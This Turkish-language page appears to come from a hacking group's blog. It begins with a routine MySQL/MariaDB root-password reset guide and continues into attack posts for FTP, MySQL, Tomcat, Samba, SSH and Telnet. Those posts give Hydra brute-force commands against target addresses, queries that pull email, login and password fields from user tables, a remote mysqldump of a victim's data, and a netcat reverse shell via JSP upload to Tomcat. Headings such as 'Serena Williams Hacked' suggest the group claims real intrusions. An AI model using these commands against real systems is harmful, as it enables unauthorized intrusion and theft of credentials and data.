Trazer Hacked

Posted by ROOTAYYILDIZ



MySQL / MariaDB root şifrenizi unuttuysanız bu doküman size şifrenizi kurtarmanıza yardımcı olacaktır. Birçok kullanıcının başına gelebilecek olan bu durum basitçe anlatılmıştır.

Gereksinimler

MySQL veya MariaDB’ nin üzerinde çalıştığı Linux sunucunuza sudo yetkili hesabınızla giriş yapmalısınız.

Veritabanı Sürümü Kontrolü

Aşağıdaki komut bize veritabanımızın sürümü hakkında bilgi verecektir.
$ mysql --version
MySQL veritabanı çalışıyorsa sunucunuzda aşağıdakine benzer bir çıktı ile karşılaşacaksınız.
mysql Ver 14.14 Distrib 5.5.53, for debian-linux-gnu (x86_64) using readline 6.3
MariaDB veritabanı çalışıyorsa sunucunuzda aşağıdakine benzer bir çıktı ile karşılaşacaksınız.
mysql Ver 15.1 Distrib 5.5.52-MariaDB, for Linux (x86_64) using readline 5.1
Şimdi burada hangi veritabanı türü ve sürümünü kullandığımızı not etmemiz gerek. Dokümanın ilerleyen kısımlarında bu bilgiler işimize yarayacak.

Veritabanının Durdurulması

Root şifresini değiştirmeden ömce çalışan veritabanını durdurmamız gerekmketedir.
Aşağıdaki komut ile MySQL veritabanınızı durdurabilirsiniz.
$ sudo systemctl stop mysql
Aşağıdaki komut ile MariaDB veritabanınızı durdurabilirsiniz.
$ sudo systemctl stop mariadb

İzin Kontrolü Olmadan Veritabanının Başlatılması

Eğer MySQL veya MariaDB veritabanlarınızı kullanıcı ayrıcalıkları olmadan çalıştırırsanız şifresiz olarak veritabanı komut satırına erişim sağlayabilirsiniz.
Bunu yapabilmek için kullanıcı ayrıcalıkları bilgilerini tutan grant tables’ ı ve başka kullanıcıların erişimini önleyen networking’ i durdumanız gerekmektedir.
Veritabanını hem grant tables’ ı yüklemeden hem de networking’ i başlatmadan aşağıdaki komut ile çalıştırmalıyız.
$ sudo mysqld_safe --skip-grant-tables --skip-networking &
Buradaki ampersand(&) karakterini kullanmamızın sebebi ilgili işlemi arka plana göndermek içindir, bu şekilde ilgili işlem arka plan da çalışmaya devam ederken biz de sunucu üzerinde işlemlerimize devam edebiliriz.
Şimdi veritabanımızı root kullanıcısı ile açıyoruz. Şu anda bizden şifre istememesi gerekmektedir.
$ mysql -u root
MySQL çalışan sunucumuzda aşağıdaki gibi bir çıktı ile karşılaşacaksınız.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
MariaDB çalışan sunucumuzda aşağıdaki gibi bir çıktı ile karşılaşacaksınız.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

Root Şifresinin Değiştirilmesi

ALTER USER komutu ile MySQL veritabanı root şifresini değiştirebiliriz. Ancak öncesinde çalışmasını engellediğimiz grant tables’ ın tekrardan yüklenmesini sağlamamız gerekmektedir.
Aşağıdaki komut ile veritabanı yetkilendirmelerinin tekrardan okunarak, güncel olmasını sağlamalısınız.
mysql> FLUSH PRIVILEGES;
MySQL 5.7.6 / MariaDB 10.1.20 ve daha yeni sürümler için aşağıdaki şekilde root şifresini değiştirebiliriz.
 mysql> ALTER USER 'root'@'localhost' IDENTIFIED BY 'Yeni_rootSifreniz';
MySQL 5.7.5 / MariaDB 10.1.20 ve daha eski sürümleri için aşağıdaki şekilde root şifresini değiştirebiliriz.
 mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('Yeni_rootSifreniz');
Aşağıdaki gibi bir çıktı ile karşılaşacaksınız.
Query OK, 0 rows affected (0.00 sec)
Eğer ALTER USER komutu işe yaramadıysa aşağıdaki UPDATE … SET komutları ile root şifrenizi sıfırlamayı deneyebilirsiniz.
mysql> UPDATE mysql.user SET authentication_string = PASSWORD('Yeni_rootSifreniz') WHERE User = 'root' AND Host = 'localhost';
Bu işlem sonrasında grant tables’ ı tekrar aktif etmeyi unutmayınız. Bu işlem için aşağıdaki komut ile veritabanı yetkilendirmelerinin tekrardan okunarak, güncel olmasını sağlamalısınız.
mysql> FLUSH PRIVILEGES;

Veritabanının Tekrardan Normal Şekilde Başlatılması

Tüm aşamaları başarılı şekilde yapıp root şifresini sıfırladıktan sonra artık veritabanımızı normal şekilde çalıştırıp, root kullanıcısı ile erişim sağlayabilirsiniz.
MySQL işleminin sonlanması için aşağıdaki komut yardımcı olacaktır.
$ sudo kill `cat /var/run/mysqld/mysqld.pid`
MariaDB işleminin sonlanması için aşağıdaki komut yardımcı olacaktır.
$ sudo kill `/var/run/mariadb/mariadb.pid`
Şimdi MySQL veya MariaDB veritabanı çalışan sunucumuzda ilgili servisleri tekrar çalıştıralım.
MySQL veritabanı için aşağıdaki komut yardımcı olacaktr.
$ sudo systemctl start mysql
MariaDB veritabanı için aşağıdaki komut yardımcı olacaktr.
$ sudo systemctl start mariadb
Şimdi yeni verdiğimiz root şifresi ile giriş yapabiliriz.
$ mysql -u root -p
Bu komut sonrası yeni atadığınız şifre ile başarılı şekilde veritabanınıza giriş yapabilirsiniz.


FTP(File Transfer Protocol) 21.port üzerinde çalışan TCP bazlı bir servistir. Website dosyalarını sunucuya atmak için kullanılır.Saldırgan bu protokole erişim sağladıktan sonra Önemli Dosyaları Çalabilir veya Uzaktan Kod Yürütebilir.
Çoklu proje geliştiren firmalarda ftp girişi genelde “anonymous”dur.Yani user=anonymous , password=xxx@hotmail.com(random bir e-postadır) olarak girilebilir.Servise bağlandıktan sonra temel linux komutları geçerlidir.Örneğin sistemde gerekli yetki mevcut ise “get x” komutu ile sistemdeki x dosyasını çekebiliriz.
Eğer FTP girişi anonymous değilse Kali Linux’da yüklü olarak gelen “Hydra” adlı tool ile Brute Force Yapabiliriz.Bunu terminali açarak şu şekilde yapıyoruz:
hydra -l ‘kullanıcı adı’ -P ‘Kullanılacak Şifre Wordlistinin Yolu’ ‘hedef ip adresi’ ftp -vV
Komutu ile Brute Force yapabiliriz.Brute Force doğru giriş bilgilerini bulduğu zaman yeşil bir şekilde ekrana yansıtacaktır.
Bu servise pentest yapmanın bir başka yolu ise Servisin versiyonuna uygun public edilmiş bir exploiti kullanarak sızmaktır.Bu işlemi bir sonraki yazımızda detaylı bir biçimde ele alacağız.

21.PORT(FTP) SALDIRILARI

Posted by ROOTAYYILDIZ


MySQL 3306 numaralı port üzerinde çalışan TCP bazlı bir servistir.Diğer servislerin aksine MySQL’de mutlaka root adında bir kullanıcı vardır.Bu servis üzerine kaba kuvvet saldırıları(Brute Force) yapılırken user olarak root kullanılır.
MySQL üzerine Kali Linux’da yüklü olarak gelen “Hydra” adlı tool ile kaba kuvvet saldırıları gerçekleştirilir.Bunun için terminali açarak şu komutu gireriz:
hydra -l root(kullanıcı adı) -P ”şifre için kullanılacak wordlist’in yolu” mysql://ip adresi
komutu ile MySQL servisi üzerine kaba kuvvet saldırıları yapılabilir.Hydra doğru giriş bilgilerini bulduktan sonra ekranda yeşil bir yazıyla gösterecektir.
Bu servis üzerine girişler bazen parolasız olabilir.Bu girişler sadece kullanıcı adıyla yapılır yani root ile giriş yapılır.Bunun sebebi firmanın parolasız girişi EVET olarak bırakmasıdır.Ve servise şöyle bağlanılır:
mysql -u root -p -h “hedef ip adresi”
Bu servise bağlandıktan sonra kullanılacak bazı komutlar aşağıdaki gibidir:
Örnek bir MySQL üzerinden gidelim.Veri tabanımızın adı x olsun.Tablomuzun adı y olsun ve tablomuzun içinde users_users adında bir dosya olsun.Bu dosyanın içerisinde de e-mail,login,password adında veriler olsun.
show databases => Veri Tabanlarını Görüntüleriz
use x => x Veri Tabanının İçindeki Tabloları Gösterir.
describes y => y Tablosunun İçindekileri Gösterir.
select e-mail,login,password from users_users; =>e-mail,login ve password Bilgilerini Seçeriz.
MySQL’de yeterli yetkimiz var ise sistemin Geri Yükleme(Backup) dosyalarını alabiliriz.Bunun İçin “mysqldump” aracını kullanırız.
Bunun için örnek bir sistem oluşturalım.Sistemimizin adı “BUG” olsun.Bu sistemin Backup dosyasını almak için aşağıdaki komutu kullanıyoruz:
mysqldump -h “hedef ip adresi” -u root -p “Parola” bug > bug_backup.txt
Böylece bug adındaki sistemin backup dosyalarını bilgisayarımıza alıyoruz.
MySQL servisi üzerine yapılabilecek saldırılar bunlard

MySQL SALDIRILARI

Posted by ROOTAYYILDIZ


Tomcat 8080/8180 portunda çalışan TCP bazlı bir servisdir.Tomcat saldırıları genelde küçük wordlistlerle gerçekleştirilir.Çünkü Tomcat servisi 15-20 giriş denemesinden sonra kendini 3-5 dakika arası kitler.Bu yüzden Tomcat servisine manuel kaba kuvvet saldırısı yapmak en mantıklısıdır.
Tomcat servisine tarayıcı üzerinden erişilir.Herhangi bir yol ile Tomcat giriş bilgilerine eriştiğimiz bir sisteme .jsp uzantılı dosyalar yüklenebilir.Bu dosyalar ile uzaktan kod yürütme işlemi gerçekleştirilebilir.Bu dosyalara Github’dan rahatlıkla erişim sağlayabilirsiniz.
Bir örnek vermek gerekirse Uzaktan Kod Yürütme ile kendimize bir Netcat Shell bağlantısı alabiliriz.
Örnek Komutlar Aşağıdaki Gibidir:
Kali Linux’da terminali açıp şu komutu gireriz:
nc -l -v -p 4444
Uzaktaki komut satırımıza da şu komutu veriyoruz:
nc -e bin/bash “ip adresi” 4444
Ve böylelikle hedefin komut satırında istediğimiz komutları çalıştırabiliriz.

TOMCAT SALDIRILARI

Posted by ROOTAYYILDIZ

 

 

SAMBA SALDIRILARI:

Samba,445 numaralı portta çalışan TCP bazlı bir servistir.Kullanım amacı genelde domain kurmak,dosya paylaşımını yönetmek,sistem yönetmektir.
Microsoft sistemlerde kullanımı daha sık görülür.Linux sistemlerde genelde tercih edilmez.Nadir olarak kullanılırlar.
Bu sistemlerde “Anonymous Login” tarzı bir login mevcut olabilir.
Samba’ya şöyle giriş yapılır:
rpcclient -U** “ip adresi” ile giriş yapılır.
Samba’ya erişim sağlandıktan sonra “enum4linux” toolu kullanılarak erişilebilecek bütün bilgilere erişim sağlanır.
Örneğin bir dizine şöyle erişilir:
smbclient //ip adresi /tmp => dizine erişir.
Ayrıca exploit-db ve birçok exploit sitesinde samba üzerine yazılmış exploitler mevcuttur.

SSH SALDIRILARI:

SSH,22 numaralı port üzerinde çalışan TCP bazlı bir servistir.SSH servisinin amacı uzaktan yönetimdir.Bu porta Pentest işlemi sadece kaba kuvvet(Brute Force) saldırısı ile yapılabilir.
Kaba kuvvet saldırılarında “Hydra” adlı tool kullanılır.
Hydra’yı bu saldırıda şöyle kullanırız:
hydra -l “kullanıcı adı” -P “Password için kullanıcalak wordlistin yolu” ssh://”İp Adresi”
Hydra bu komutla birlikte Brute Force’yi başlatır.Doğru giriş bilgilerini bulduktan sonra ekranda yeşil bir yazı ile gösterecektir.Kullanıcı bilgilerini öğrendikten sonra şöyle bağlanıyoruz:
ssh “kullanıcı adı” “İp adresi”

TELNET SALDIRILARI:

Telnet,23. portta çalışan bir servisdir.Kullanım amacı SSH İle aynıdır.Yani uzaktan yönetimdir.Fakat SSH servisine göre daha güvensizdir.
Genel saldırı mantığı brute forceye dayanır.Çoğunlukla varsayılan parolalar kullanılır.

Serena Williams Hacked

Posted by ROOTAYYILDIZ

[ root ⚔ αyyιldιz ]